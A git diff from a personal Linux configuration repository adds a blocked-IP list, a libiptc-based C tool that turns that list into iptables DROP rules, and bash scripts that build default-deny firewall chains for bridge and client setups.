+93.67.167.236
+93.70.209.6
+93.70.230.233
+93.72.242.221
+93.74.231.250
+93.75.26.231
+93.75.26.73
+93.75.65.164
+93.76.133.197
+93.77.92.222
+93.78.245.85
+93.78.49.245
+93.79.31.7
+93.80.159.79
+93.80.231.19
+93.84.111.7
+93.85.92.98
+93.86.105.135
+93.89.134.17
+93.89.190.250
+93.89.226.17
+93.92.61.34
+93.99.130.51
+93.99.130.52
+94.100.18.38
+94.100.6.27
+94.100.6.72
+94.102.49.152
+94.102.49.190
+94.102.49.193
+94.102.49.64
+94.102.51.0/24
+94.102.52.195
+94.102.54.8
+94.102.56.235
+94.102.56.252
+94.103.175.86
+94.103.36.55
+94.107.166.97
+94.112.181.44
+94.113.227.61
+94.122.244.1
+94.122.67.2
+94.124.247.20
+94.126.169.121
+94.130.10.89
+94.132.230.45
+94.137.69.108
+94.138.160.170
+94.139.202.161
+94.139.207.122
+94.140.116.189
+94.140.116.190
+94.141.83.184
+94.141.90.171
+94.153.197.206
+94.154.11.100
+94.154.86.120
+94.155.131.3
+94.156.133.65
+94.158.149.124
+94.158.245.51
+94.159.43.22
+94.159.80.30
+94.159.80.36
+94.159.80.42
+94.168.35.70
+94.177.226.105
+94.177.247.100
+94.178.0.80
+94.178.144.243
+94.178.146.239
+94.178.200.238
+94.178.96.120
+94.179.162.116
+94.180.121.10
+94.180.236.155
+94.180.40.123
+94.183.40.240
+94.184.88.15
+94.19.181.192
+94.191.102.122
+94.191.28.158
+94.191.28.198
+94.191.51.58
+94.191.71.58
+94.192.150.24
+94.193.96.145
+94.199.16.192
+94.20.233.140
+94.20.42.1
+94.201.187.188
+94.205.52.130
+94.205.66.58
+94.212.141.189
+94.213.162.221
+94.215.248.202
+94.22.137.138
+94.224.144.71
+94.224.232.47
+94.227.250.31
+94.228.9.41
+94.229.72.46
+94.23.1.200
+94.23.193.221
+94.23.24.30
+94.23.41.146
+94.23.5.195
+94.230.120.168
+94.230.199.121
+94.230.208.147
+94.230.208.148
+94.231.130.172
+94.232.252.56
+94.236.93.165
+94.240.249.81
+94.242.57.2
+94.242.59.89
+94.244.134.107
+94.245.2.43
+94.245.37.91
+94.245.51.138
+94.246.126.43
+94.246.126.7
+94.248.11.227
+94.248.5.84
+94.248.6.40
+94.249.28.187
+94.254.2.71
+94.254.35.29
+94.255.172.75
+94.255.187.82
+94.255.212.253
+94.255.246.250
+94.255.247.17
+94.255.247.25
+94.255.247.7
+94.255.72.6
+94.27.160.37
+94.28.61.8
+94.3.197.141
+94.31.138.182
+94.31.53.203
+94.32.66.15
+94.34.249.177
+94.41.234.175
+94.43.91.184
+94.49.138.20
+94.5.179.20
+94.5.189.188
+94.50.119.240
+94.50.237.12
+94.51.212.128
+94.51.25.121
+94.51.48.161
+94.51.50.165
+94.52.77.85
+94.53.118.57
+94.54.232.185
+94.6.168.100
+94.61.73.128
+94.67.102.194
+94.72.158.241
+94.73.150.20
+94.74.132.67
+94.74.175.125
+94.75.173.239
+94.75.19.217
+94.79.36.220
+94.90.3.145
+94.90.3.147
+94.90.3.149
+94.93.61.211
+94.93.61.229
+94.97.3.5
+94.97.71.245
+94.97.86.201
+94.99.238.13
+95.0.141.135
+95.105.142.248
+95.105.52.151
+95.109.46.9
+95.110.46.80
+95.12.145.219
+95.128.43.164
+95.128.60.140
+95.129.183.172
+95.13.23.194
+95.13.249.182
+95.13.48.135
+95.130.10.69
+95.130.12.33
+95.130.9.90
+95.131.75.52
+95.132.235.240
+95.135.193.45
+95.137.133.24
+95.137.197.69
+95.137.239.94
+95.137.251.155
+95.141.35.15
+95.141.61.58
+95.143.193.125
+95.144.71.192
+95.144.8.39
+95.15.41.11
+95.155.55.99
+95.156.109.174
+95.157.32.246
+95.158.167.211
+95.158.52.27
+95.159.22.29
+95.163.107.14/31
+95.163.118.101
+95.163.118.117
+95.163.138.230
+95.163.248.76
+95.163.255.199
+95.163.255.200/31
+95.163.255.203
+95.163.255.204/30
+95.163.255.208/29
+95.163.255.217
+95.163.255.219
+95.163.255.220/30
+95.163.255.224/28
+95.163.255.240/30
+95.163.255.244/31
+95.163.255.246
+95.165.133.22
+95.165.161.144
+95.165.168.12
+95.168.191.117
+95.168.191.6
+95.170.192.110
+95.171.1.153
+95.172.92.151
+95.173.169.15
+95.173.184.40
+95.174.67.59
+95.174.99.2
+95.176.176.219
+95.179.150.158
+95.179.202.166
+95.179.230.207
+95.179.242.52
+95.179.59.226
+95.180.128.195
+95.180.231.104
+95.180.79.174
+95.181.116.77
+95.181.217.159
+95.181.3.181
+95.188.242.190
+95.188.255.6
+95.190.17.196
+95.192.16.118
+95.192.185.165
+95.211.118.194
+95.213.177.122
+95.213.184.187
+95.213.228.203
+95.215.1.171
+95.215.96.231
+95.216.107.148
+95.216.145.1
+95.216.225.72
+95.216.251.45
+95.216.29.137
+95.216.5.212
+95.216.59.5
+95.218.222.79
+95.218.242.240
+95.219.205.229
+95.232.231.117
+95.234.191.33
+95.236.203.7
+95.237.132.168
+95.237.145.210
+95.238.138.212
+95.24.183.5
+95.243.231.194
+95.244.31.196
+95.245.86.149
+95.252.214.197
+95.253.111.24
+95.27.163.146
+95.28.12.248
+95.28.217.66
+95.29.142.244
+95.31.22.193
+95.32.37.220
+95.32.45.124
+95.34.169.102
+95.37.247.19
+95.38.59.146
+95.38.67.180
+95.42.126.41
+95.42.237.229
+95.42.245.202
+95.43.220.254
+95.46.105.76
+95.5.236.72
+95.5.47.33
+95.55.151.8
+95.56.12.240
+95.56.232.146
+95.57.115.12
+95.57.41.161
+95.57.48.94
+95.58.16.222
+95.58.4.6
+95.59.208.129
+95.59.214.35
+95.59.62.138
+95.6.16.145
+95.6.19.206
+95.6.59.68
+95.6.77.61
+95.65.15.99
+95.65.19.165
+95.65.94.170
+95.68.102.68
+95.68.156.89
+95.68.98.16
+95.7.213.123
+95.70.136.114
+95.70.142.218
+95.70.151.117
+95.70.157.198
+95.70.194.131
+95.70.194.207
+95.70.196.214
+95.70.197.242
+95.70.224.77
+95.70.224.90
+95.70.230.77
+95.70.233.164
+95.76.173.134
+95.76.255.212
+95.79.30.59
+95.80.164.20
+95.80.245.235
+95.80.93.52
+95.81.0.29
+95.81.0.83
+95.81.1.43
+95.84.135.81
+95.84.155.87
+95.84.182.140
+95.84.186.235
+95.84.186.63
+95.84.195.233
+95.84.197.92
+95.84.223.51
+95.84.227.164
+95.84.228.212
+95.84.244.193
+95.85.107.225
+95.85.107.52
+95.85.16.178
+95.85.97.253
+95.87.11.23
+95.87.15.93
+95.87.228.235
+95.87.44.104
+95.9.118.187
+95.9.150.127
+95.9.173.193
+95.9.180.146
+95.9.190.110
+95.9.197.45
+95.9.207.130
+95.9.244.254
+95.9.245.36
+95.90.1.174
+95.94.12.16
+96.125.135.0/24
+96.125.136.188
+96.125.169.97
+96.126.100.87
+96.127.158.234/31
+96.127.158.236/31
+96.127.158.238
+96.18.165.117
+96.244.71.124
+96.30.177.45
+96.30.226.108
+96.30.227.34
+96.30.234.48
+96.30.79.37
+96.30.80.126
+96.36.101.238
+96.39.64.150
+96.43.141.186
+96.45.6.226
+96.47.156.147
+96.47.226.20
+96.47.228.114
+96.52.76.226
+96.64.178.150
+96.66.15.147
+96.67.109.131
+96.67.224.11
+96.68.45.185
+96.69.11.243
+96.69.120.161
+96.70.31.155
+96.71.189.20
+96.71.220.49
+96.73.112.186
+96.74.157.116
+96.74.253.173
+96.76.250.161
+96.77.238.181
+96.78.15.186
+96.79.122.225
+96.79.137.178
+96.79.239.57
+96.79.6.12
+96.8.147.110
+96.8.234.193
+96.80.251.85
+96.81.29.6
+96.84.165.99
+96.84.176.54
+96.85.227.246
+96.87.122.123
+96.87.237.210
+96.9.129.149
+96.9.159.119
+96.9.168.42
+96.9.210.108
+96.9.74.191
+96.90.86.229
+96.91.158.182
+96.92.47.189
+96.93.123.241
+96.94.3.57
+96.95.187.73
+97.101.105.202
+97.101.59.170
+97.105.15.251
+97.74.237.196
+97.75.255.253
+97.76.69.174
+97.84.170.206
+97.88.224.7
+98.103.169.75
+98.110.78.226
+98.113.22.77
+98.116.73.162
+98.118.166.235
+98.124.243.32
+98.127.70.242
+98.14.93.20
+98.150.137.1
+98.156.109.126
+98.162.168.167
+98.174.90.43
+98.176.174.61
+98.180.240.135
+98.181.171.105
+98.181.21.95
+98.191.197.138
+98.198.88.197
+98.203.133.196
+98.207.103.220
+98.207.138.67
+98.209.36.170
+98.211.187.240
+98.213.170.145
+98.221.101.56
+98.221.127.207
+98.221.27.108
+98.226.6.208
+98.235.133.140
+98.238.248.116
+98.24.137.64
+98.24.204.245
+98.250.250.4
+98.253.19.31
+98.30.109.120
+98.6.205.218
+99.135.177.80
+99.196.102.147
+99.228.178.92
+99.233.182.91
+99.234.12.246
+99.24.237.211
+99.245.243.33
+99.34.169.26
+99.35.124.46
+99.81.255.230
diff --git a/linux/conf/iptables/ip_blocker.c b/linux/conf/iptables/ip_blocker.c
new file mode 100644
index 0000000..c36a4ad
--- /dev/null
+++ b/linux/conf/iptables/ip_blocker.c
@@ -0,0 +1,226 @@
+/*
+ * Souce: https://bani.com.br/2012/05/programmatically-managing-iptables-rules-in-c-iptc/
+ *
+ * changed by silvino at bk dot ru to meet personal taste
+ * to query https://tldp.org/HOWTO/Querying-libiptc-HOWTO/mfunction.html
+ */
+
+#define BUFSIZ 64
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <errno.h>
+#include <string.h>
+#include <libiptc/libiptc.h>
+
+struct {
+    struct ipt_entry entry;
+    struct xt_standard_target target;
+} entry;
+
+//struct xtc_handle *h;
+
+static int insert_rule (
+        //struct xtc_handle *h,
+        const char *table,
+        const char *chain,
+        unsigned int src,
+        int inverted_src,
+        unsigned int dest,
+        int inverted_dst,
+        const char *target) {
+
+
+    struct xtc_handle *h;
+    int ret = 1;
+
+    h = iptc_init (table);
+    if (!h) {
+        fprintf (stderr, "Could not init IPTC library: %s\n", iptc_strerror (errno));
+        goto out;
+    }
+
+    entry.entry.ip.src.s_addr  = INADDR_ANY;
+    entry.entry.ip.smsk.s_addr = 0;
+    entry.entry.ip.dst.s_addr  = INADDR_ANY;
+    entry.entry.ip.dmsk.s_addr = 0;
+
+    /* target */
+    entry.target.target.u.user.target_size = XT_ALIGN (sizeof (struct xt_standard_target));
+    strncpy (entry.target.target.u.user.name, target, sizeof (entry.target.target.u.user.name));
+
+    /* entry */
+    entry.entry.target_offset = sizeof (struct ipt_entry);
+    entry.entry.next_offset = entry.entry.target_offset + entry.target.target.u.user.target_size;
+
+    if (src) {
+        entry.entry.ip.src.s_addr  = src;
+        entry.entry.ip.smsk.s_addr = 0xFFFFFFFF;
+        if (inverted_src)
+            entry.entry.ip.invflags |= IPT_INV_SRCIP;
+    }
+
+    if (dest) {
+        entry.entry.ip.dst.s_addr  = dest;
+        entry.entry.ip.dmsk.s_addr = 0xFFFFFFFF;
+        if (inverted_dst)
+            entry.entry.ip.invflags |= IPT_INV_DSTIP;
+    }
+
+    if (!iptc_append_entry (chain, (struct ipt_entry *) &entry, h)) {
+        fprintf (stderr, "Could not insert a rule in iptables (table %s): %s\n", table, iptc_strerror (errno));
+        return ret;
+    }
+
+    if (!iptc_commit (h)) {
+        fprintf (stderr, "Could not commit changes in iptables (table %s): %s\n", table, iptc_strerror (errno));
+        return ret;
+    }
+
+    ret = 0;
+out:
+    if (h)
+        iptc_free(h);
+
+    return ret;
+}
+
+void *xrealloc(void *ptr, size_t size) {
+    ptr = realloc(ptr, size);
+    if (ptr == NULL && size != 0) {
+        exit(EXIT_FAILURE);
+    }
+    return ptr;
+}
+
+char *xstrdup(const char *s) {
+    char *t;
+
+    if (s == NULL)
+        return NULL;
+
+    t = strdup(s);
+
+    if (t == NULL) {
+        exit(EXIT_FAILURE);
+    }
+
+    return t;
+}
+
+char *file_read_line_alloc(FILE *fp) {
+    char buf[BUFSIZ];
+    unsigned int buf_len;
+    char *line = NULL;
+    unsigned int line_size = 0;
+    int got_nl = 0;
+
+    buf[0] = '\0';
+
+    while (fgets(buf, BUFSIZ, fp)) {
+        buf_len = strlen(buf);
+        if (buf[buf_len - 1] == '\n') {
+            buf_len--;
+            buf[buf_len] = '\0';
+            got_nl = 1;
+        }
+        if (line) {
+            line_size += buf_len;
+            line = xrealloc(line, line_size + 1);
+            strncat(line, buf, line_size);
+        } else {
+            line_size = buf_len + 1;
+            line = xstrdup(buf);
+        }
+        if (got_nl)
+            break;
+    }
+
+    return line;
+}
+
+
+int main (int argc, char **argv) {
+    const char *chain_in="blockip_in";
+    const char *chain_out="blockip_out";
+    long int total=0;
+
+    if(argc > 1 && strcmp(argv[1], "-h") == 0){
+        printf("\nip_blocker accepts a list of ip's from a file or stdin\n");
+        printf("ip's are added to %s and %s chains\n\n", chain_in, chain_out);
+        printf("ip_blocker [file]\n");
+        exit(0);
+    }
+
+    unsigned int a, b, ret;
+    char *line = NULL;
+    FILE *fp = argc > 1 ? fopen (argv[1], "r") : stdin;
+    if (!fp) {
+        fprintf (stderr, "error: file open failed '%s'.\n", argv[1]);
+        exit(EXIT_FAILURE);
+    }
+
+    memset (&entry, 0, sizeof (entry));
+
+    while (line = file_read_line_alloc(fp)) {
+        inet_pton (AF_INET, line, &a);
+        ret = insert_rule (
+            // handler
+            //h,
+            //const char *table,
+            "filter",
+            //const char *chain,
+            chain_in,
+            //unsigned int src,
+            a,
+            //int inverted_src,
+            0,
+            //unsigned int dest,
+            NULL,
+            //int inverted_dst,
+            0,
+            //const char *target
+            "DROP");
+
+        if(ret == 1){
+            printf("Failed to add %s to %s does %s chain exists ?", line, chain_in, chain_in);
+            free (line);
+            fclose(fp);
+            exit(EXIT_FAILURE);
+        }
+
+        ret = insert_rule (
+            // handler
+            //h,
+            //const char *table,
+            "filter",
+            //const char *chain,
+            chain_out,
+            //unsigned int src,
+            NULL,
+            //int inverted_src,
+            0,
+            //unsigned int dest,
+            a,
+            //int inverted_dst,
+            0,
+            //const char *target
+            "DROP");
+
+        if(ret == 1){
+            printf("Failed to add %s to %s does %s chain exists ?", line, chain_out, chain_out);
+            free (line);
+            fclose(fp);
+            exit(EXIT_FAILURE);
+        }
+        total = total + 1;
+        free (line);
+        line = NULL;
+    }
+
+    if(fp){
+        fclose(fp);
+    }
+    printf ("total ip's added; %i\n", total);
+    return 0;
+}
diff --git a/linux/conf/iptables/ipt-bridge.sh b/linux/conf/iptables/ipt-bridge.sh
new file mode 100644
index 0000000..b0f7daa
--- /dev/null
+++ b/linux/conf/iptables/ipt-bridge.sh
@@ -0,0 +1,94 @@
+#!/bin/bash
+
+# Unlimited on loopback
+$IPT -A INPUT -i lo -s ${PUB_IP} -d ${PUB_IP} -j ACCEPT
+$IPT -A OUTPUT -o lo -s ${PUB_IP} -d ${PUB_IP} -j ACCEPT
+
+#########################################################################
+#         FORWARD
+#########################################################################
+
+$IPT -A FORWARD -j blocker
+$IPT -A FORWARD -j blockip_in
+$IPT -A FORWARD -j blockip_out
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -s ${BR_NET} -d ${BR_NET} -j ACCEPT
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF}  -p udp --dport 520 --sport 520 -j DROP
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -s 0.0.0.0 -d 255.255.255.255 -j srv_dhcp
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -s 10.0.0.4 -d 212.55.154.174 -j ACCEPT
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -s 10.0.0.4 -d 204.140.20.21 -j ACCEPT
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -s 10.0.0.4 -d 50.23.197.95 -j ACCEPT
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -s 10.0.0.4 -d 50.23.197.94 -j ACCEPT
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -s 10.0.0.4 -d 212.55.154.174 -j ACCEPT
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -s 10.0.0.4 -d 204.140.20.21 -j ACCEPT
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -s 10.0.0.4 -d 50.23.197.94 -j ACCEPT
+
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -d 10.0.0.4 -s 212.55.154.174 -j ACCEPT
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -d 10.0.0.4 -s 204.140.20.21 -j ACCEPT
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -d 10.0.0.4 -s 50.23.197.95 -j ACCEPT
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -d 10.0.0.4 -s 50.23.197.94 -j ACCEPT
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -d 10.0.0.4 -s 212.55.154.174 -j ACCEPT
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -d 10.0.0.4 -s 204.140.20.21 -j ACCEPT
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -d 10.0.0.4 -s 50.23.197.94 -j ACCEPT
+
+
+$IPT -A FORWARD -i ${BR_IF} -m physdev --physdev-in tap1 --physdev-out ${PUB_IF} -s 10.0.0.3 -j cli_https_out
+$IPT -A FORWARD -i ${BR_IF} -m physdev --physdev-in tap1 --physdev-out ${PUB_IF} -s 10.0.0.3 -j cli_http_out
+$IPT -A FORWARD -i ${BR_IF} -m physdev --physdev-out tap1 --physdev-in ${PUB_IF} -d 10.0.0.3 -j cli_https_in
+$IPT -A FORWARD -i ${BR_IF} -m physdev --physdev-out tap1 --physdev-in ${PUB_IF} -d 10.0.0.3 -j cli_http_in
+#####Server
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -m physdev --physdev-in ${PUB_IF} -d 10.0.0.4 -j srv_ssh_in
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -m physdev --physdev-in tap2 -s 10.0.0.4 -j srv_ssh_out
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -m physdev --physdev-in ${PUB_IF} -d 10.0.0.4 -j srv_git_in
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -m physdev --physdev-in tap2 -s 10.0.0.4 -j srv_git_out
+#$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -m physdev --physdev-in ${PUB_IF} -d 10.0.0.4 -j srv_ntp
+
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -m physdev --physdev-in ${PUB_IF} -d 10.0.0.4 -j cli_http_in
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -m physdev --physdev-in tap2 -s 10.0.0.4 -j cli_http_out
+#####HTTP Server
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -m physdev --physdev-in ${PUB_IF} -d 10.0.0.4 -j srv_http_in
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -m physdev --physdev-in tap2 -s 10.0.0.4 -j srv_http_out
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -m physdev --physdev-in ${PUB_IF} -d 10.0.0.4 -j srv_https_in
+$IPT -A FORWARD -i ${BR_IF} -o ${BR_IF} -m physdev --physdev-in tap2 -s 10.0.0.4 -j srv_https_out
+
+#########################################################################
+#         INPUT
+#########################################################################
+$IPT -A INPUT -j blocker
+$IPT -A INPUT -j blockip_in
+$IPT -A INPUT -i ${BR_IF} -p udp --dport 520 --sport 520 -j DROP
+$IPT -A INPUT -i ${BR_IF} -d ${PUB_IP} -p tcp  --sport 3030 -j DROP
+
+$IPT -A INPUT -i ${BR_IF} -d ${PUB_IP} -s ${DNS} -j cli_dns_in
+$IPT -A INPUT -i ${BR_IF} -m physdev --physdev-in tap2 -s ${BR_NET} -d ${PUB_IP} -j cli_http_in
+$IPT -A INPUT -i ${BR_IF} -m physdev --physdev-in ${PUB_IF} -s ${GW} -j cli_http_in
+$IPT -A INPUT -i ${BR_IF} -m physdev --physdev-in ${PUB_IF} -j cli_https_in
+$IPT -A INPUT -i ${BR_IF} -m physdev --physdev-in tap2 -j cli_https_in
+$IPT -A INPUT -i ${BR_IF} -d ${PUB_IP} -s ${BR_NET} -j cli_ssh_in
+$IPT -A INPUT -i ${BR_IF} -d ${PUB_IP} -s 10.0.0.4 -j cli_git_in
+$IPT -A INPUT -i ${BR_IF} -d ${PUB_IP} -s ${BR_NET} -j srv_dns_in
+$IPT -A INPUT -i ${BR_IF} -m physdev --physdev-in ${PUB_IF} -s ${GW} -j srv_dhcp
+$IPT -A INPUT -i ${BR_IF} -m physdev --physdev-in ${PUB_IF} -s ${BR_NET} -j srv_dhcp
+
+$IPT -A INPUT -i ${BR_IF} -d ${PUB_IP} -s ${BR_NET} -j srv_ssh_in
+#$IPT -A INPUT -j LOG
+
+$IPT -A OUTPUT -o ${BR_IF} -p udp --dport 520 --sport 520 -j DROP
+
+$IPT -A OUTPUT -o ${BR_IF} -s ${PUB_IP} -p tcp --dport 3030 -j DROP
+$IPT -A OUTPUT -o blockip_out
+
+$IPT -A OUTPUT -o ${BR_IF} -s ${PUB_IP} -d ${DNS} -j cli_dns_out
+$IPT -A OUTPUT -o ${BR_IF} -s ${PUB_IP} -d ${BR_NET} -j srv_dns_out
+$IPT -A OUTPUT -o ${BR_IF} -s ${PUB_IP} -d ${BR_NET} -j srv_ssh_out
+$IPT -A OUTPUT -o ${BR_IF} -s ${PUB_IP} -d ${BR_NET} -j cli_http_out
+$IPT -A OUTPUT -o ${BR_IF} -s ${PUB_IP} -d ${GW} -j cli_http_out
+$IPT -A OUTPUT -o ${BR_IF} -s ${PUB_IP} -j cli_https_out
+$IPT -A OUTPUT -o ${BR_IF} -s ${PUB_IP} -d ${BR_NET} -j cli_ssh_out
+$IPT -A OUTPUT -o ${BR_IF} -s ${PUB_IP} -d 10.0.0.4 -j cli_git_out
+$IPT -A OUTPUT -o ${BR_IF} -d ${BR_NET} -j srv_dhcp
+$IPT -A OUTPUT -o ${BR_IF} -d ${BR_NET} -j srv_icmp
+
+## log everything else and drop
+ipt_log
+
+iptables-save > /etc/iptables/bridge.v4
diff --git a/linux/conf/iptables/ipt-client.sh b/linux/conf/iptables/ipt-client.sh
new file mode 100644
index 0000000..3e82bf7
--- /dev/null
+++ b/linux/conf/iptables/ipt-client.sh
@@ -0,0 +1,60 @@
+#!/bin/bash
+
+echo "setting dhcp network..."
+
+if [ "${GW}" == "" ]; then
+
+	$IPT -A INPUT  -j srv_icmp
+	$IPT -A OUTPUT -j srv_icmp
+	$IPT -A INPUT  -j srv_dhcp
+	$IPT -A OUTPUT -j srv_dhcp
+
+	echo "no gateway, wating for one..."
+
+	while [ "${GW}" == "" ]
+	do
+		#we wait for a connection
+		sleep 2;
+		GW=$(ip route | grep "default via" | cut -d " " -f 3)
+	done
+fi
+
+echo "setting client network..."
+
+####### Input Chain ######
+$IPT -A INPUT -j blocker
+$IPT -A INPUT -j blockip_in
+
+$IPT -A INPUT -i ${PUB_IF} -j cli_dns_in
+$IPT -A INPUT -i ${PUB_IF} -j cli_http_in
+$IPT -A INPUT -i ${PUB_IF} -j cli_https_in
+$IPT -A INPUT -i ${PUB_IF} -j cli_git_in
+$IPT -A INPUT -i ${PUB_IF} -j cli_ssh_in
+$IPT -A INPUT -i ${PUB_IF} -j srv_icmp
+$IPT -A INPUT -i ${PUB_IF} -j cli_pops_in
+$IPT -A INPUT -i ${PUB_IF} -j cli_smtps_in
+$IPT -A INPUT -i ${PUB_IF} -j cli_irc_in
+$IPT -A INPUT -i ${PUB_IF} -j cli_ftp_in
+$IPT -A INPUT -i ${PUB_IF} -j cli_gpg_in
+$IPT -A INPUT -i ${PUB_IF} -p udp --sport 520 --dport 520 -j ACCEPT
+
+
+####### Output Chain ######
+$IPT -A OUTPUT -j blocker
+$IPT -A OUTPUT -j blockip_out
+
+$IPT -A OUTPUT -o ${PUB_IF} -j cli_dns_out
+$IPT -A OUTPUT -o ${PUB_IF} -j cli_https_out
+$IPT -A OUTPUT -o ${PUB_IF} -j cli_ssh_out
+$IPT -A OUTPUT -o ${PUB_IF} -j cli_git_out
+$IPT -A OUTPUT -o ${PUB_IF} -j cli_git_out
+$IPT -A OUTPUT -o ${PUB_IF} -j srv_icmp
+$IPT -A OUTPUT -o ${PUB_IF} -j cli_pops_out
+$IPT -A OUTPUT -o ${PUB_IF} -j cli_smtps_out
+$IPT -A OUTPUT -o ${PUB_IF} -j cli_irc_out
+$IPT -A OUTPUT -o ${PUB_IF} -j cli_ftp_out
+$IPT -A OUTPUT -o ${PUB_IF} -j cli_gpg_out
+$IPT -A OUTPUT -o ${PUB_IF} -p udp --sport 1024:655335 --dport 1024:65535 -j ACCEPT
+
+## log everything else and drop
+ipt_log
diff --git a/linux/conf/iptables/ipt-conf.sh b/linux/conf/iptables/ipt-conf.sh
new file mode 100644
index 0000000..8d57f5f
--- /dev/null
+++ b/linux/conf/iptables/ipt-conf.sh
@@ -0,0 +1,47 @@
+#!/bin/bash
+
+IPT="/usr/sbin/iptables"
+IPT6="/usr/sbin/ip6tables"
+
+SPAMLIST="/etc/iptables/blockedip"
+SPAMDROPMSG="BLOCKED IP: "
+
+#TYPE=bridge
+#TYPE=server
+#TYPE=open
+TYPE=client
+
+# bridge interface with interface facing gateway
+#BR_IF="br0"
+
+# bridge ip network address
+BR_NET="10.0.0.0/8"
+#BR_NET="192.0.0.0/8"
+# static wifi ip network address
+#WIFI_NET="10.0.0.0/8"
+
+# network gateway
+#GW="10.0.0.1"
+GW=$(ip route | grep "default via" | cut -d " " -f 3)
+
+# external dns
+#DNS="10.0.0.254"
+#DNS=$(grep -m 1 "nameserver " /etc/resolv.conf | cut -d " " -f 2)
+DNS=$(grep -m 1 "^server=" /etc/dnsmasq.conf | cut -d "=" -f 2)
+
+# public interface facing gateway
+#PUB_IF="wlp9s0"
+PUB_IF="enp7s0"
+
+# wifi interface
+#WIFI_IF="wlp7s0"
+
+# static machine ip address
+#PUB_IP="10.0.0.4"
+# deserve much better :(
+PUB_IP=$(ifconfig ${PUB_IF} | grep -m 1 "addr:" | cut -d " " -f 12 | cut -d ":" -f 2)
+
+echo "GW: ${GW}"
+echo "DNS: ${DNS}"
+echo "PUB_IF: ${PUB_IF}"
+echo "PUB_IP: ${PUB_IP}"
diff --git a/linux/conf/iptables/ipt-firewall.sh b/linux/conf/iptables/ipt-firewall.sh
new file mode 100644
index 0000000..0391e33
--- /dev/null
+++ b/linux/conf/iptables/ipt-firewall.sh
@@ -0,0 +1,313 @@
+#!/bin/bash
+
+. /etc/iptables/ipt-conf.sh
+
+ipt_clear () {
+    echo "clear all iptables tables"
+
+    $IPT -F
+    $IPT -X
+    $IPT6 -F
+    $IPT6 -X
+    #$PIT4 -Z
+    #$PIT6 -Z
+    $IPT -t nat -F
+    $IPT -t nat -X
+    $IPT -t mangle -F
+    $IPT -t mangle -X
+    $IPT -t raw -F
+    $IPT -t raw -X
+    $IPT -t security -F
+    $IPT -t security -X
+    $IPT -N blocker
+    $IPT -N blockip_in
+    $IPT -N blockip_out
+
+    $IPT -N srv_dhcp
+    $IPT -N srv_rip
+    $IPT -N srv_icmp
+    $IPT -N srv_ntp
+    $IPT -N srv_dns_in
+    $IPT -N srv_dns_out
+    $IPT -N srv_http_in
+    $IPT -N srv_http_out
+    $IPT -N srv_https_in
+    $IPT -N srv_https_out
+    $IPT -N srv_smtp_in
+    $IPT -N srv_smtp_out
+    $IPT -N srv_ssh_in
+    $IPT -N srv_ssh_out
+    $IPT -N srv_git_in
+    $IPT -N srv_git_out
+    $IPT -N srv_db_in
+    $IPT -N srv_db_out
+
+
+    $IPT -N cli_dns_in
+    $IPT -N cli_dns_out
+    $IPT -N cli_http_in
+    $IPT -N cli_http_out
+    $IPT -N cli_https_in
+    $IPT -N cli_https_out
+    $IPT -N cli_ssh_in
+    $IPT -N cli_ssh_out
+    $IPT -N cli_pops_in
+    $IPT -N cli_pops_out
+    $IPT -N cli_smtps_in
+    $IPT -N cli_smtps_out
+    $IPT -N cli_irc_in
+    $IPT -N cli_irc_out
+    $IPT -N cli_ftp_in
+    $IPT -N cli_ftp_out
+    $IPT -N cli_git_in
+    $IPT -N cli_git_out
+    $IPT -N cli_gpg_in
+    $IPT -N cli_gpg_out
+
+    # Set Default Rules
+    $IPT -P INPUT DROP
+    $IPT -P FORWARD DROP
+    $IPT -P OUTPUT DROP
+
+    # Set Default Rules
+    $IPT6 -P INPUT DROP
+    $IPT6 -P FORWARD DROP
+    $IPT6 -P OUTPUT DROP
+
+}
+
+ipt_log () {
+    ## log everything else and drop
+    $IPT -A OUTPUT -j LOG --log-level 7 --log-prefix "iptables: OUTPUT: "
+    $IPT -A INPUT -j LOG --log-level 7 --log-prefix "iptables: INPUT: "
+    $IPT -A FORWARD -j LOG --log-level 7 --log-prefix "iptables: FORWARD: "
+
+    $IPT6 -A OUTPUT -j LOG --log-level 7 --log-prefix "iptables: OUTPUT: "
+    $IPT6 -A INPUT -j LOG --log-level 7 --log-prefix "iptables: INPUT: "
+    $IPT6 -A FORWARD -j LOG --log-level 7 --log-prefix "iptables: FORWARD: "
+}
+
+ipt_tables () {
+    echo "start adding tables..."
+    # Filter out comments and blank lines
+    # store each ip or subnet in $ip
+    if [ -f ip_blocker ]
+    then
+        ./ip_blocker ${SPAMLIST}
+    else
+        grep -v '^#' < ${SPAMLIST} | { while read ip
+        do
+          # Append everything to droplist
+          #echo "adding ${ip} to blockip"
+          $IPT -A blockip_in -s $ip -j LOG --log-prefix "${SPAMDROPMSG}"
+          $IPT -A blockip_in -s $ip -j DROP
+          $IPT -A blockip_out -d $ip -j LOG --log-prefix "${SPAMDROPMSG}"
+          $IPT -A blockip_out -d $ip -j DROP
+        done; }
